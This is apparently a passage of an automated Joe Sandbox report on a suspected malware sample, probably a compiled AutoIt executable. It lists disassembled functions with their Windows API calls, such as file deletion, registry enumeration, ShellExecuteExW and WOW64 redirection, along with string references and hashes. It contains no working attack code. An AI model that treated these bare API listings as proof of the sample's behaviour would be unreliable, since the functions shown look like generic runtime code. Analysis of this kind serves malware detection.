__Init_thread_footer.LIBCMT ref: 00797BFB

Part of subcall function 007301F8: EnterCriticalSection.KERNEL32(007E070C,?,?,00728747,007E2514), ref: 00730202
Part of subcall function 007301F8: LeaveCriticalSection.KERNEL32(007E070C,?,00728747,007E2514), ref: 00730235

Strings

+Tv, xrefs: 00797E2E
G, xrefs: 00797C7F
5, xrefs: 00797C78
Variable must be of type 'Object'., xrefs: 00797C3A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +Tv$5$G$Variable must be of type 'Object'.
API String ID: 535116098-960950384
Opcode ID: e818b5c8e1e42a082aca37c9de6eddaf358e1ef105d3a2c59341eaeebb608889
Instruction ID: 138e8bf49927cae45a7c690dcc88912c4f30414e035a2e5d46fe7741fc3150a3
Opcode Fuzzy Hash: e818b5c8e1e42a082aca37c9de6eddaf358e1ef105d3a2c59341eaeebb608889
Instruction Fuzzy Hash: 34919D70A14209EFCF08EF58E8959BDB7B5FF49300F148059F8069B292DB79AE41CB60

Function 0077C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0077C6EE
_wcslen.LIBCMT ref: 0077C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0077C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0077C7CA

Strings

0, xrefs: 0077C6AF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 9524ff773dc5870ba3009f2e4554cb33ade6b35976880d42d0c38e5e7812105c
Instruction ID: e4276643fcd350c21c370fcc79d4352cc44f1fde62878ac59636615cd89e3e9b
Opcode Fuzzy Hash: 9524ff773dc5870ba3009f2e4554cb33ade6b35976880d42d0c38e5e7812105c
Instruction Fuzzy Hash: D751E2716043409BDB1A9F28C889B6B77E8AF8D390F04892DF999D31D1DB7CDD448B92

Function 0079AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0079AEA3

Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625

GetProcessId.KERNEL32(00000000), ref: 0079AF38
CloseHandle.KERNEL32(00000000), ref: 0079AF67

Strings

<, xrefs: 0079AE6B
@, xrefs: 0079AE72

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: cdf2a832b94df7bd397ee55c17daef432c27488778508feb2b1fbb33577e4310
Instruction ID: 9ccfbbed16f0a5db175c83c0e687b380da033b827b1b3618d9582f0dcd96bb2b
Opcode Fuzzy Hash: cdf2a832b94df7bd397ee55c17daef432c27488778508feb2b1fbb33577e4310
Instruction Fuzzy Hash: 8C715971A00615EFCF15DF58D489A9EBBF1BF08310F048499E816AB292CB79ED81CB91

Function 0077719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00777206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0077723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0077724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007772CF

Strings

DllGetClassObject, xrefs: 00777242

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: dc975ce3799741bead7a939358c7a5cf81f4823c8aca7537842266290d497c5a
Instruction ID: 68e2d1c8bd5cb6918dfde83badba3b5eedee120004a21fe97aa7bb55086fa275
Opcode Fuzzy Hash: dc975ce3799741bead7a939358c7a5cf81f4823c8aca7537842266290d497c5a
Instruction Fuzzy Hash: 94418FB1604204EFDF19CF54C884A9A7BB9FF89350F14C0A9BD099F20AD7B8D940DBA0

Function 007A3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A3E35
IsMenu.USER32(?), ref: 007A3E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A3E92
DrawMenuBar.USER32 ref: 007A3EA5

Strings

0, xrefs: 007A3D89

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 9015fac6bc19d14dcec7cafc51b0da4d04f9dd4bbe15be1d4ea14440b64593fb
Instruction ID: 13c184cca3bff44fc20c342e04d6f3f735ecc8592d8d89997c9b6857713b69ad
Opcode Fuzzy Hash: 9015fac6bc19d14dcec7cafc51b0da4d04f9dd4bbe15be1d4ea14440b64593fb
Instruction Fuzzy Hash: 17416A75A05209EFDB10DF50D884AEABBB5FF8A351F04822AF9159B250D738AE50CF50

Function 007A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007A2F8D
LoadLibraryW.KERNEL32(?), ref: 007A2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007A2FA9
DestroyWindow.USER32(?), ref: 007A2FB1

Strings

SysAnimate32, xrefs: 007A2F68

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: a606cb0fc9f22cb9ef4772d077992dbe7d9d1ce3783bef8f7214c8a80ca442d3
Instruction ID: f1e19102666e9e5b69d669826fb8565fd56d8cfd3d80efd865fab22f27d7219a
Opcode Fuzzy Hash: a606cb0fc9f22cb9ef4772d077992dbe7d9d1ce3783bef8f7214c8a80ca442d3
Instruction Fuzzy Hash: 9421FD71200209AFEB118F68DC84FBB37BDEB9A364F104718FA10D61A1D739DC829760

Function 00734D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00734D1E,007428E9,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002), ref: 00734D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00734DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00734D1E,007428E9,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002,00000000), ref: 00734DC3

Strings

CorExitProcess, xrefs: 00734D98
mscoree.dll, xrefs: 00734D86

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2c08451982a47ae69370906c79a6187338dfae6dd7db653a4dd90a49e9105535
Instruction ID: 410814cb9ab3bce3f687c58d6921a141659b18509778921c9d3cc090cd145da4
Opcode Fuzzy Hash: 2c08451982a47ae69370906c79a6187338dfae6dd7db653a4dd90a49e9105535
Instruction Fuzzy Hash: 2EF0AF70A00208BBEB169F90DC09BEEBFF5EF44711F0040A4F906A2261CF38AD40CAD4

Function 0076D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0076D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0076D3BF
FreeLibrary.KERNEL32(00000000), ref: 0076D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0076D3B9
X64, xrefs: 0076D2A8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: edc6575d6ff3e1db41f52acbc7fe7cac23d8edf1378b8316a22e1e817358884a
Instruction ID: 3f2dcebd46b362c5cb135a191aec6b4663c8788ddf74b382f0d6329337a4021d
Opcode Fuzzy Hash: edc6575d6ff3e1db41f52acbc7fe7cac23d8edf1378b8316a22e1e817358884a
Instruction Fuzzy Hash: 58F055F0F26620EFD7322712CC289293220BF42701B688165FC03E5210EB7CCC408A97

Function 00714E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00714EAE
FreeLibrary.KERNEL32(00000000,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714EC0

Strings

kernel32.dll, xrefs: 00714E94
Wow64DisableWow64FsRedirection, xrefs: 00714EA8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 506b291061bb901010142dc8cf4a0aa2a89482770ee3292f8f75991103ca582b
Instruction ID: 9aa1a6f459f2c48c6ea7790d064aaf66b3c68a590e72d875e08959f4af8f7bb3
Opcode Fuzzy Hash: 506b291061bb901010142dc8cf4a0aa2a89482770ee3292f8f75991103ca582b
Instruction Fuzzy Hash: EBE0CD75B015227BD3331729FC18B9F6554AFC3F627054215FC05D2240DB6CCD4544B5

Function 00714E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00714E74
FreeLibrary.KERNEL32(00000000,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00714E6E
kernel32.dll, xrefs: 00714E5B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 30ab4ae6ec78a45eac47b155025840616053b3011a891292e85c91f327e4b905
Instruction ID: 78e65608dd35b7b3e62933c9fc941a8e462dfecf3b900d250eb1922a456da8b8
Opcode Fuzzy Hash: 30ab4ae6ec78a45eac47b155025840616053b3011a891292e85c91f327e4b905
Instruction Fuzzy Hash: 5DD0C2756026227747231B28BC09DCB2A18AFC2B113054211F801A2150CF2DCD4281E4

Function 00782947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00782C05
DeleteFileW.KERNEL32(?), ref: 00782C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00782C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00782CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00782CC0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 7ad573deb9425d1e180062dc453392705985674d9cdf39e94da5958f77e1dc0c
Instruction ID: 254bfb0f410f271fcb47f30e0e50e50b879f0c9a7082e3327118a3b2c01e4d0b
Opcode Fuzzy Hash: 7ad573deb9425d1e180062dc453392705985674d9cdf39e94da5958f77e1dc0c
Instruction Fuzzy Hash: B8B16071D01119EBDF25EBA4CC89EDEBB7DEF48310F1040A6F509E6142EB399A458F61

Function 0079A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0079A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0079A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0079A468
CloseHandle.KERNEL32(?), ref: 0079A63D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 9e1fa1ef340e2725c8df0ce4f4a3b7a3a4489a002ce931f95b54674a846398c7
Instruction ID: f0654350a0f4ab12c15a14ad1be2623ee47ef16e567ca7009ffcbe1bab95f825
Opcode Fuzzy Hash: 9e1fa1ef340e2725c8df0ce4f4a3b7a3a4489a002ce931f95b54674a846398c7
Instruction Fuzzy Hash: D4A16371604301AFDB20DF28D88AF2AB7E5AF84714F14885DF9599B2D2DB74EC41CB92

Function 0074BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007B3700), ref: 0074BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,007E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0074BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,007E1270,000000FF,?,0000003F,00000000,?), ref: 0074BC36
_free.LIBCMT ref: 0074BB7F

Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0

_free.LIBCMT ref: 0074BD4B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 829a87ff1201dc7a0f427eea7a63ad545f4b10913166f5c18cf583f0d60d4296
Instruction ID: 51849eb818130a8ba831df56c52fd57aabaee995ffc31dd87913a8d783ac7da9
Opcode Fuzzy Hash: 829a87ff1201dc7a0f427eea7a63ad545f4b10913166f5c18cf583f0d60d4296
Instruction Fuzzy Hash: 0151C571A00209EFCB10EF659CC69AEB7BCFF45310B5142AAE554D71A1EB38DE41CBA4

Function 0077E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0077CF22,?), ref: 0077DDFD

Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0077CF22,?), ref: 0077DE16

Part of subcall function 0077E199: GetFileAttributesW.KERNEL32(?,0077CF95), ref: 0077E19A

lstrcmpiW.KERNEL32(?,?), ref: 0077E473
MoveFileW.KERNEL32(?,?), ref: 0077E4AC
_wcslen.LIBCMT ref: 0077E5EB
_wcslen.LIBCMT ref: 0077E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0077E650

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: a681c5ff316cd3d822c3c13274a0272721963f8dc7aff9782bb8e3f3bd9d046b
Instruction ID: 7de46a64412b19a985d649f4bd1f46299dd7428d67a1b5e1c57d249a61f8507e
Opcode Fuzzy Hash: a681c5ff316cd3d822c3c13274a0272721963f8dc7aff9782bb8e3f3bd9d046b
Instruction Fuzzy Hash: 7351B8B25083859BDB34DB94CC859DF73DCAF89340F00491EF689D3191EF79A6888766

Function 0079B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 0079C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079C9F1
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA68
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0079BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0079BB63
RegCloseKey.ADVAPI32(?,?), ref: 0079BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0079BBB3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: dfe1c56ba07afd5cbddc69ad3a4f45c0020937f78a1725c4f3ba33b8837d8c49
Instruction ID: f12b0e1ef2ac51e472d8c5aceb3025810dc2680a41d8c304e53d2bdff3e6ae3b
Opcode Fuzzy Hash: dfe1c56ba07afd5cbddc69ad3a4f45c0020937f78a1725c4f3ba33b8837d8c49
Instruction Fuzzy Hash: B461E371208241EFC714DF24D994E6ABBE5FF84308F14855CF4998B2A2DB39ED45CB92

Function 00778BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00778BCD
VariantClear.OLEAUT32 ref: 00778C3E
VariantClear.OLEAUT32 ref: 00778C9D
VariantClear.OLEAUT32(?), ref: 00778D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00778D3B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: ae19fbed29144ec61f156ac0ef7788505ace1e69d5f7302c0b2264a8758e73e9
Instruction ID: 92bb5fa71d503dab30741ee3f898015536c8387d4b4e8cf3e505d85c9ef84007
Opcode Fuzzy Hash: ae19fbed29144ec61f156ac0ef7788505ace1e69d5f7302c0b2264a8758e73e9
Instruction Fuzzy Hash: 29516DB5A00219EFCB10CF68C894AAABBF4FF8D350B158559E919DB350E734E911CFA4

